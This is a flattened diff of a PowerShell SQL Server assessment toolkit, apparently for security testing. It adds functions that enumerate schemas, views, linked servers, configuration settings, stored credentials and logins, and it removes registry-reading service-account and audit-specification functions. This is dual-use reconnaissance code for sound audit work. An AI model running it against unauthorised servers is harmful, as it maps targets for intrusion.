-Credential $Credential -SuppressVerbose + # Get tables for each database + $TblDatabases | + ForEach-Object -Process { + # Get database name + $DbName = $_.DatabaseName - # Append results - $TblSysadminStatus = $TblSysadminStatus + $TblSysadminStatusTemp + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Grabbing Schemas from the $DbName database..." + } + + # Define Query + $Query = " USE $DbName; + SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + DB_NAME() AS [DatabaseName], + s.schema_id AS [SchemaId], + s.name AS [SchemaName], + s.principal_id AS [OwnerId], + USER_NAME(s.principal_id) AS [OwnerName] + FROM + sys.schemas AS s + JOIN + [$DbName].[INFORMATION_SCHEMA].[SCHEMATA] AS i + ON + s.name = i.SCHEMA_NAME + $SchemaNameFilter + ORDER BY s.name;" + + # Execute Query + $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -SuppressVerbose + + # Append results + $TblSchemas = $TblSchemas + $TblResults + } } End { # Return data - $TblSysadminStatus + if($ShowRoleSchemas){ + $TblSchemas + }else{ + $TblSchemas | Where SchemaId -lt 1000 + } } } # ---------------------------------- -# Get-SQLServiceAccount +# Get-SQLView # ---------------------------------- # Author: Scott Sutherland -Function Get-SQLServiceAccount +Function Get-SQLView { <# .SYNOPSIS - Returns a list of service account names for SQL Servers services by querying the registry with xp_regread. This can be executed against remote systems. + Returns view information from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password @@ -4647,21 +5914,31 @@ Function Get-SQLServiceAccount SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. + .PARAMETER DatabaseName + Database name to filter for. + .PARAMETER ViewName + View name to filter for. + .PARAMETER NoDefaults + Only display results from non default databases. .EXAMPLE - PS C:\> Get-SQLServiceAccount -Instance SQLServer1\STANDARDDEV2014 - - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - DBEngineLogin : LocalSystem - AgentLogin : NT Service\SQLAgent$STANDARDDEV2014 - BrowserLogin : NT AUTHORITY\LOCALSERVICE - WriterLogin : LocalSystem - AnalysisLogin : NT Service\MSOLAP$STANDARDDEV2014 - ReportLogin : NT Service\ReportServer$STANDARDDEV2014 - IntegrationLogin : NT Service\MsDtsServer120 + PS C:\> Get-SQLView -Instance SQLServer1\STANDARDDEV2014 -DatabaseName master + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + DatabaseName : master + SchemaName : dbo + ViewName : spt_values + ViewDefinition : + create view spt_values as + select name collate database_default as name, + number, + type collate database_default as type, + low, high, status + from sys.spt_values + IsUpdatable : NO + CheckOption : NONE .EXAMPLE - PS C:\> Get-SQLInstanceDomain | Get-SQLServiceAccount -Verbose + PS C:\> Get-SQLInstanceDomain | Get-SQLView -Verbose #> [CmdletBinding()] Param( @@ -4683,6 +5960,20 @@ Function Get-SQLServiceAccount HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Database name.')] + [string]$DatabaseName, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'View name.')] + [string]$ViewName, + + [Parameter(Mandatory = $false, + HelpMessage = "Don't select tables from default databases.")] + [switch]$NoDefaults, + [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose @@ -4691,13 +5982,21 @@ Function Get-SQLServiceAccount Begin { # Table for output - $TblServiceAccount = New-Object -TypeName System.Data.DataTable + $TblViews = New-Object -TypeName System.Data.DataTable + + # Setup View filter + if($ViewName) + { + $ViewFilter = " where table_name like '%$ViewName%'" + } + else + { + $ViewFilter = '' + } } Process { - # Note: Tables queried by this function typically require sysadmin privileges. - # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance @@ -4716,6 +6015,7 @@ Function Get-SQLServiceAccount if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." + Write-Verbose -Message "$Instance : Grabbing views from the databases below:" } } else @@ -4727,131 +6027,68 @@ Function Get-SQLServiceAccount return } - # Get sysadmin status - $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin - - if($IsSysadmin -eq 'Yes') + # Setup NoDefault filter + if($NoDefaults) { - $SysadminSetup = " - -- Get SQL Server Browser - Static Location - EXECUTE master.dbo.xp_instance_regread - @rootkey = N'HKEY_LOCAL_MACHINE', - @key = N'SYSTEM\CurrentControlSet\Services\SQLBrowser', - @value_name = N'ObjectName', - @value = @BrowserLogin OUTPUT - - -- Get SQL Server Writer - Static Location - EXECUTE master.dbo.xp_instance_regread - @rootkey = N'HKEY_LOCAL_MACHINE', - @key = N'SYSTEM\CurrentControlSet\Services\SQLWriter', - @value_name = N'ObjectName', - @value = @WriterLogin OUTPUT - - -- Get MSOLAP - Calculated - EXECUTE master.dbo.xp_instance_regread - N'HKEY_LOCAL_MACHINE', @MSOLAPInstance, - N'ObjectName',@AnalysisLogin OUTPUT - - -- Get Reporting - Calculated - EXECUTE master.dbo.xp_instance_regread - N'HKEY_LOCAL_MACHINE', @ReportInstance, - N'ObjectName',@ReportLogin OUTPUT - - -- Get SQL Server DTS Server / Analysis - Calulated - EXECUTE master.dbo.xp_instance_regread - N'HKEY_LOCAL_MACHINE', @IntegrationVersion, - N'ObjectName',@IntegrationDtsLogin OUTPUT" - - $SysadminQuery = ' ,[BrowserLogin] = @BrowserLogin, - [WriterLogin] = @WriterLogin, - [AnalysisLogin] = @AnalysisLogin, - [ReportLogin] = @ReportLogin, - [IntegrationLogin] = @IntegrationDtsLogin' + # Get list of databases + $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose } else { - $SysadminSetup = '' - $SysadminQuery = '' + # Get list of databases + $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose } - # Define Query - $Query = " -- Setup variables - DECLARE @SQLServerInstance VARCHAR(250) - DECLARE @MSOLAPInstance VARCHAR(250) - DECLARE @ReportInstance VARCHAR(250) - DECLARE @AgentInstance VARCHAR(250) - DECLARE @IntegrationVersion VARCHAR(250) - DECLARE @DBEngineLogin VARCHAR(100) - DECLARE @AgentLogin VARCHAR(100) - DECLARE @BrowserLogin VARCHAR(100) - DECLARE @WriterLogin VARCHAR(100) - DECLARE @AnalysisLogin VARCHAR(100) - DECLARE @ReportLogin VARCHAR(100) - DECLARE @IntegrationDtsLogin VARCHAR(100) - - -- Get Service Paths for default and name instance - if @@SERVICENAME = 'MSSQLSERVER' or @@SERVICENAME = HOST_NAME() - BEGIN - -- Default instance paths - set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQLSERVER' - set @MSOLAPInstance = 'SYSTEM\CurrentControlSet\Services\MSSQLServerOLAPService' - set @ReportInstance = 'SYSTEM\CurrentControlSet\Services\ReportServer' - set @AgentInstance = 'SYSTEM\CurrentControlSet\Services\SQLSERVERAGENT' - set @IntegrationVersion = 'SYSTEM\CurrentControlSet\Services\MsDtsServer'+ SUBSTRING(CAST(SERVERPROPERTY('productversion') AS VARCHAR(255)),0, 3) + '0' - END - ELSE - BEGIN - -- Named instance paths - set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQL$' + cast(@@SERVICENAME as varchar(250)) - set @MSOLAPInstance = 'SYSTEM\CurrentControlSet\Services\MSOLAP$' + cast(@@SERVICENAME as varchar(250)) - set @ReportInstance = 'SYSTEM\CurrentControlSet\Services\ReportServer$' + cast(@@SERVICENAME as varchar(250)) - set @AgentInstance = 'SYSTEM\CurrentControlSet\Services\SQLAgent$' + cast(@@SERVICENAME as varchar(250)) - set @IntegrationVersion = 'SYSTEM\CurrentControlSet\Services\MsDtsServer'+ SUBSTRING(CAST(SERVERPROPERTY('productversion') AS VARCHAR(255)),0, 3) + '0' - END - - -- Get SQL Server - Calculated - EXECUTE master.dbo.xp_instance_regread - N'HKEY_LOCAL_MACHINE', @SQLServerInstance, - N'ObjectName',@DBEngineLogin OUTPUT - - -- Get SQL Server Agent - Calculated - EXECUTE master.dbo.xp_instance_regread - N'HKEY_LOCAL_MACHINE', @AgentInstance, - N'ObjectName',@AgentLogin OUTPUT + # Get tables for each database + $TblDatabases | + ForEach-Object -Process { + # Get database name + $DbName = $_.DatabaseName - $SysadminSetup + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : - $DbName" + } - -- Dislpay results - SELECT '$ComputerName' as [ComputerName], - '$Instance' as [Instance], - [DBEngineLogin] = @DBEngineLogin, - [AgentLogin] = @AgentLogin - $SysadminQuery" + # Define Query + $Query = " USE $DbName; + SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + TABLE_CATALOG as [DatabaseName], + TABLE_SCHEMA as [SchemaName], + TABLE_NAME as [ViewName], + VIEW_DEFINITION as [ViewDefinition], + IS_UPDATABLE as [IsUpdatable], + CHECK_OPTION as [CheckOption] + FROM [INFORMATION_SCHEMA].[VIEWS] + $ViewFilter + ORDER BY TABLE_CATALOG,TABLE_SCHEMA,TABLE_NAME" - # Execute Query - $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + # Execute Query + $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose - # Append results - $TblServiceAccount = $TblServiceAccount + $TblResults + # Append results + $TblViews = $TblViews + $TblResults + } } End { # Return data - $TblServiceAccount + $TblViews } } # ---------------------------------- -# Get-SQLAuditDatabaseSpec +# Get-SQLServerLink # ---------------------------------- # Author: Scott Sutherland -Function Get-SQLAuditDatabaseSpec +Function Get-SQLServerLink { <# .SYNOPSIS - Returns Audit database specifications from target SQL Servers. + Returns link servers from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password @@ -4860,18 +6097,40 @@ Function Get-SQLAuditDatabaseSpec SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. - .PARAMETER DAC - Connect using Dedicated Admin Connection. - .PARAMETER AuditName - Audit name. - .PARAMETER AuditSpecification - Audit specification. - .PARAMETER AuditAction - Audit action name. + .PARAMETER DatabaseLinkName + Database link name to filter for. .EXAMPLE - PS C:\> Get-SQLAuditDatabaseSpec -Verbose -Instance "SQLServer1" + PS C:\> Get-SQLServerLink -Instance SQLServer1\STANDARDDEV2014 + + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + DatabaseLinkId : 0 + DatabaseLinkName : SQLServer1\STANDARDDEV2014 + DatabaseLinkLocation : Local + Product : SQL Server + Provider : SQLNCLI + Catalog : + Local Login : Uses Self Credentials + RemoteLoginName : + is_rpc_out_enabled : True + is_data_access_enabled : False + modify_date : 3/13/2016 12:30:33 PM + + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + DatabaseLinkId : 1 + DatabaseLinkName : SQLServer2\SQLEXPRESS + DatabaseLinkLocation : Remote + Product : SQL Server + Provider : SQLNCLI + Catalog : + Local Login : + RemoteLoginName : user123 + is_rpc_out_enabled : False + is_data_access_enabled : True + modify_date : 5/6/2016 10:20:44 AM .EXAMPLE - PS C:\> Get-SQLInstanceLocal | Get-SQLAuditDatabaseSpec -Verbose + PS C:\> Get-SQLInstanceLocal | Get-SQLServerLink -Verbose #> [CmdletBinding()] Param( @@ -4894,67 +6153,34 @@ Function Get-SQLAuditDatabaseSpec [string]$Instance, [Parameter(Mandatory = $false, + ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Audit name.')] - [string]$AuditName, + HelpMessage = 'SQL Server link name.')] + [string]$DatabaseLinkName, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Specification name.')] - [string]$AuditSpecification, - - [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Audit action name.')] - [string]$AuditAction, - - - - [Parameter(Mandatory = $false, - HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] - [switch]$SuppressVerbose - ) + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) Begin { # Table for output - $TblAuditDatabaseSpec = New-Object -TypeName System.Data.DataTable - - # Setup audit name filter - if($AuditName) - { - $AuditNameFilter = " and a.name like '%$AuditName%'" - } - else - { - $AuditNameFilter = '' - } - - # Setup spec name filter - if($AuditSpecification) - { - $SpecNameFilter = " and s.name like '%$AuditSpecification%'" - } - else - { - $SpecNameFilter = '' - } + $TblServerLinks = New-Object -TypeName System.Data.DataTable - # Setup action name filter - if($AuditAction) + # Setup DatabaseLinkName filter + if($DatabaseLinkName) { - $ActionNameFilter = " and d.audit_action_name like '%$AuditAction%'" + $VDatabaseLinkNameFilter = " WHERE a.name like '$DatabaseLinkName'" } else { - $ActionNameFilter = '' + $DatabaseLinkNameFilter = '' } } Process { - # Note: Tables queried by this function typically require sysadmin privileges. - # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance @@ -4964,7 +6190,6 @@ Function Get-SQLAuditDatabaseSpec $Instance = $env:COMPUTERNAME } - # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' @@ -4985,53 +6210,58 @@ Function Get-SQLAuditDatabaseSpec return } - # Define Query $Query = " SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], - audit_id as [AuditId], - a.name as [AuditName], - s.name as [AuditSpecification], - d.audit_action_id as [AuditActionId], - d.audit_action_name as [AuditAction], - s.is_state_enabled, - d.is_group, - s.create_date, - s.modify_date, - d.audited_result - FROM sys.server_audits AS a - JOIN sys.database_audit_specifications AS s - ON a.audit_guid = s.audit_guid - JOIN sys.database_audit_specification_details AS d - ON s.database_specification_id = d.database_specification_id WHERE 1=1 - $AuditNameFilter - $SpecNameFilter - $ActionNameFilter" + a.server_id as [DatabaseLinkId], + a.name AS [DatabaseLinkName], + CASE a.Server_id + WHEN 0 + THEN 'Local' + ELSE 'Remote' + END AS [DatabaseLinkLocation], + a.product as [Product], + a.provider as [Provider], + a.catalog as [Catalog], + 'LocalLogin' = CASE b.uses_self_credential + WHEN 1 THEN 'Uses Self Credentials' + ELSE c.name + END, + b.remote_name AS [RemoteLoginName], + a.is_rpc_out_enabled, + a.is_data_access_enabled, + a.modify_date + FROM [Master].[sys].[Servers] a + LEFT JOIN [Master].[sys].[linked_logins] b + ON a.server_id = b.server_id + LEFT JOIN [Master].[sys].[server_principals] c + ON c.principal_id = b.local_principal_id + $DatabaseLinkNameFilter" # Execute Query - $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -SuppressVerbose + $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Append results - $TblAuditDatabaseSpec = $TblAuditDatabaseSpec + $TblResults + $TblServerLinks = $TblServerLinks + $TblResults } End { # Return data - $TblAuditDatabaseSpec + $TblServerLinks } } # ---------------------------------- -# Get-SQLAuditServerSpec +# Get-SQLServerConfiguration # ---------------------------------- # Author: Scott Sutherland -Function Get-SQLAuditServerSpec +Function Get-SQLServerConfiguration { <# .SYNOPSIS - Returns Audit server specifications from target SQL Servers. + Returns configuration information from the server using sp_configure. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password @@ -5040,18 +6270,10 @@ Function Get-SQLAuditServerSpec SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. - .PARAMETER DAC - Connect using Dedicated Admin Connection. - .PARAMETER AuditName - Audit name. - .PARAMETER AuditSpecification - Audit specification. - .PARAMETER AuditAction - Audit action name. .EXAMPLE - PS C:\> Get-SQLAuditServerSpec -Verbose -Instance "SQLServer1" + PS C:\> Get-SQLServerConfiguration -Instance SQLServer1\STANDARDDEV2014 .EXAMPLE - PS C:\> Get-SQLInstanceLocal | Get-SQLAuditServerSpec -Verbose + PS C:\> Get-SQLInstanceLocal | Get-SQLServerConfiguration -Verbose #> [CmdletBinding()] Param( @@ -5075,138 +6297,204 @@ Function Get-SQLAuditServerSpec [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Audit name.')] - [string]$AuditName, - - [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Specification name.')] - [string]$AuditSpecification, - - [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Audit action name.')] - [string]$AuditAction, + HelpMessage = 'Nubmer of hosts to query at one time.')] + [int]$Threads = 5, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) - Begin { - # Table for output - $TblAuditServerSpec = New-Object -TypeName System.Data.DataTable + # Setup data table for output + $TblCommands = New-Object -TypeName System.Data.DataTable + $TblResults = New-Object -TypeName System.Data.DataTable + $null = $TblResults.Columns.Add('ComputerName') + $null = $TblResults.Columns.Add('Instance') + $null = $TblResults.Columns.Add('Name') + $null = $TblResults.Columns.Add('Minimum') + $null = $TblResults.Columns.Add('Maximum') + $null = $TblResults.Columns.Add('config_value') + $null = $TblResults.Columns.Add('run_value') - # Setup audit name filter - if($AuditName) - { - $AuditNameFilter = " and a.name like '%$AuditName%'" - } - else - { - $AuditNameFilter = '' - } - # Setup spec name filter - if($AuditSpecification) - { - $SpecNameFilter = " and s.name like '%$AuditSpecification%'" - } - else - { - $SpecNameFilter = '' - } + # Setup data table for pipeline threading + $PipelineItems = New-Object -TypeName System.Data.DataTable - # Setup action name filter - if($AuditAction) + # set instance to local host by default + if(-not $Instance) { - $ActionNameFilter = " and d.audit_action_name like '%$AuditAction%'" + $Instance = $env:COMPUTERNAME } - else + + # Ensure provided instance is processed + if($Instance) { - $ActionNameFilter = '' + $ProvideInstance = New-Object -TypeName PSObject -Property @{ + Instance = $Instance + } } + + # Add instance to instance list + $PipelineItems = $PipelineItems + $ProvideInstance } Process { - # Note: Tables queried by this function typically require sysadmin privileges. + # Create list of pipeline items + $PipelineItems = $PipelineItems + $_ + } - # Parse computer name from the instance - $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + End + { + # Define code to be multi-threaded + $MyScriptBlock = { + $Instance = $_.Instance - # Default connection to local default instance - if(-not $Instance) - { - $Instance = $env:COMPUTERNAME - } + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance - # Test connection to instance - $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { - $_.Status -eq 'Accessible' - } - if($TestConnection) - { - if( -not $SuppressVerbose) + # Default connection to local default instance + if(-not $Instance) { - Write-Verbose -Message "$Instance : Connection Success." + $Instance = $env:COMPUTERNAME } - } - else - { - if( -not $SuppressVerbose) + + # Setup DAC string + if($DAC) { - Write-Verbose -Message "$Instance : Connection Failed." + # Create connection object + $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut + } + else + { + # Create connection object + $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut } - return - } - # Define Query - $Query = " SELECT '$ComputerName' as [ComputerName], - '$Instance' as [Instance], - audit_id as [AuditId], - a.name as [AuditName], - s.name as [AuditSpecification], - d.audit_action_name as [AuditAction], - s.is_state_enabled, - d.is_group, - d.audit_action_id as [AuditActionId], - s.create_date, - s.modify_date - FROM sys.server_audits AS a - JOIN sys.server_audit_specifications AS s - ON a.audit_guid = s.audit_guid - JOIN sys.server_audit_specification_details AS d - ON s.server_specification_id = d.server_specification_id WHERE 1=1 - $AuditNameFilter - $SpecNameFilter - $ActionNameFilter" + # Attempt connection + try + { + # Open connection + $Connection.Open() - # Execute Query - $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -SuppressVerbose + if(-not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } - # Append results - $TblAuditServerSpec = $TblAuditServerSpec + $TblResults - } + # Switch to track advanced options + $DisableShowAdvancedOptions = 0 - End - { - # Return data - $TblAuditServerSpec + # Get show advance status + $IsShowAdvancedEnabled = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value + + # Get sysadmin status + $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin + + # Enable show advanced options if needed + if ($IsShowAdvancedEnabled -eq 1) + { + if(-not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Show Advanced Options is already enabled." + } + } + else + { + if(-not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Show Advanced Options is disabled." + } + + if($IsSysadmin -eq 'Yes') + { + if(-not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Your a sysadmin, trying to enabled it." + } + + # Try to enable Show Advanced Options + Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',1;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Check if configuration change worked + $IsShowAdvancedEnabled2 = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value + + if ($IsShowAdvancedEnabled2 -eq 1) + { + $DisableShowAdvancedOptions = 1 + if(-not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Enabled Show Advanced Options." + } + } + else + { + if(-not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Enabling Show Advanced Options failed. Aborting." + } + } + } + } + + # Run sp_confgiure + Get-SQLQuery -Instance $Instance -Query 'sp_configure' -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | + ForEach-Object -Process { + $SettingName = $_.name + $SettingMin = $_.minimum + $SettingMax = $_.maximum + $SettingConf_value = $_.config_value + $SettingRun_value = $_.run_value + + $null = $TblResults.Rows.Add($ComputerName, $Instance, $SettingName, $SettingMin, $SettingMax, $SettingConf_value, $SettingRun_value) + } + + # Restore Show Advanced Options state if needed + if($DisableShowAdvancedOptions -eq 1 -and $IsSysadmin -eq 'Yes') + { + if(-not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Disabling Show Advanced Options" + } + $Configurations = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',0;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + } + + # Close connection + $Connection.Close() + + # Dispose connection + $Connection.Dispose() + } + catch + { + # Connection failed + if(-not $SuppressVerbose) + { + $ErrorMessage = $_.Exception.Message + Write-Verbose -Message "$Instance : Connection Failed." + #Write-Verbose " Error: $ErrorMessage" + } + } + } + + # Run scriptblock using multi-threading + $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue + + return $TblResults } } # ---------------------------------- -# Get-SQLServerPriv +# Get-SQLServerCredential # ---------------------------------- # Author: Scott Sutherland -Function Get-SQLServerPriv +Function Get-SQLServerCredential { <# .SYNOPSIS - Returns SQL Server login privilege information from target SQL Servers. + Returns credentials from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password @@ -5215,22 +6503,21 @@ Function Get-SQLServerPriv SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. - .PARAMETER PermissionName - Permission name to filter for. .EXAMPLE - PS C:\> Get-SQLServerPriv -Instance SQLServer1\STANDARDDEV2014 -PermissionName IMPERSONATE + PS C:\> Get-SQLServerCredential -Instance SQLServer1\STANDARDDEV2014 - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - GranteeName : public - GrantorName : sa - PermissionClass : SERVER_PRINCIPAL - PermissionName : IMPERSONATE - PermissionState : GRANT - ObjectName : sa - ObjectType : SQL_LOGIN + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + credential_id : 65536 + CredentialName : MyUser + credential_identity : Domain\MyUser + create_date : 5/5/2016 11:16:12 PM + modify_date : 5/5/2016 11:16:12 PM + target_type : + target_id : + [TRUNCATED] .EXAMPLE - PS C:\> Get-SQLInstanceLocal | Get-SQLServerPriv -Verbose + PS C:\> Get-SQLInstanceLocal | Get-SQLServerCredential -Verbose #> [CmdletBinding()] Param( @@ -5255,8 +6542,8 @@ Function Get-SQLServerPriv [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Permission name.')] - [string]$PermissionName, + HelpMessage = 'Credential name.')] + [string]$CredentialName, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] @@ -5265,24 +6552,21 @@ Function Get-SQLServerPriv Begin { - # Table for output - $TblServerPrivs = New-Object -TypeName System.Data.DataTable + $TblCredentials = New-Object -TypeName System.Data.DataTable - # Setup $PermissionName filter - if($PermissionName) + # Setup CredentialName filter + if($CredentialName) { - $PermissionNameFilter = " WHERE PER.permission_name like '$PermissionName'" + $CredentialNameFilter = " WHERE name like '$CredentialName'" } else { - $PermissionNameFilter = '' + $CredentialNameFilter = '' } } Process { - # Note: Tables queried by this function typically require sysadmin privileges to get all rows. - # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance @@ -5313,51 +6597,42 @@ Function Get-SQLServerPriv } # Define Query - $Query = " SELECT '$ComputerName' as [ComputerName], + $Query = " USE master; + SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], - GRE.name as [GranteeName], - GRO.name as [GrantorName], - PER.class_desc as [PermissionClass], - PER.permission_name as [PermissionName], - PER.state_desc as [PermissionState], - COALESCE(PRC.name, EP.name, N'') as [ObjectName], - COALESCE(PRC.type_desc, EP.type_desc, N'') as [ObjectType] - FROM [sys].[server_permissions] as PER - INNER JOIN sys.server_principals as GRO - ON PER.grantor_principal_id = GRO.principal_id - INNER JOIN sys.server_principals as GRE - ON PER.grantee_principal_id = GRE.principal_id - LEFT JOIN sys.server_principals as PRC - ON PER.class = 101 AND PER.major_id = PRC.principal_id - LEFT JOIN sys.endpoints AS EP - ON PER.class = 105 AND PER.major_id = EP.endpoint_id - $PermissionNameFilter - ORDER BY GranteeName,PermissionName;" + credential_id, + name as [CredentialName], + credential_identity, + create_date, + modify_date, + target_type, + target_id + FROM [master].[sys].[credentials] + $CredentialNameFilter" # Execute Query - $TblServerPrivsTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose - # Append data as needed - $TblServerPrivs = $TblServerPrivs + $TblServerPrivsTemp + # Append results + $TblCredentials = $TblCredentials + $TblResults } End { # Return data - $TblServerPrivs + $TblCredentials } } # ---------------------------------- -# Get-SQLDatabasePriv +# Get-SQLServerLogin # ---------------------------------- -# Author: Scott Sutherland -Function Get-SQLDatabasePriv +Function Get-SQLServerLogin { <# .SYNOPSIS - Returns database user privilege information from target SQL Servers. + Returns logins from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password @@ -5366,41 +6641,31 @@ Function Get-SQLDatabasePriv SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. - .PARAMETER DAC - Connect using Dedicated Admin Connection. - .PARAMETER DatabaseName - Database name to filter for. - .PARAMETER NoDefaults - Only select non default databases. - .PARAMETER PermissionName - Permission name to filter for. - .PARAMETER PermissionType - Permission type name to filter for. .PARAMETER PrincipalName - Principal name to filter for. + Pincipal name to filter for. .EXAMPLE - PS C:\> Get-SQLDatabasePriv -Instance SQLServer1\STANDARDDEV2014 -DatabaseName testdb -PermissionName "VIEW DEFINITION" + PS C:\> Get-SQLServerLogin -Instance SQLServer1\STANDARDDEV2014 | Select-Object -First 1 - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - DatabaseName : testdb - PrincipalName : createprocuser - PrincipalType : SQL_USER - PermissionType : SCHEMA - PermissionName : VIEW DEFINITION - StateDescription : GRANT - ObjectType : SCHEMA - ObjectName : dbo + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + PrincipalId : 1 + PrincipalName : sa + PrincipalSid : 1 + PrincipalType : SQL_LOGIN + CreateDate : 4/8/2003 9:10:35 AM + IsLocked : 0 .EXAMPLE - PS C:\> Get-SQLInstanceLocal | Get-SQLDatabasePriv -Verbose + PS C:\> Get-SQLInstanceLocal | Get-SQLServerLogin -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, @@ -5415,30 +6680,11 @@ Function Get-SQLDatabasePriv [string]$Instance, [Parameter(Mandatory = $false, + ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL Server database name to filter for.')] - [string]$DatabaseName, - - [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 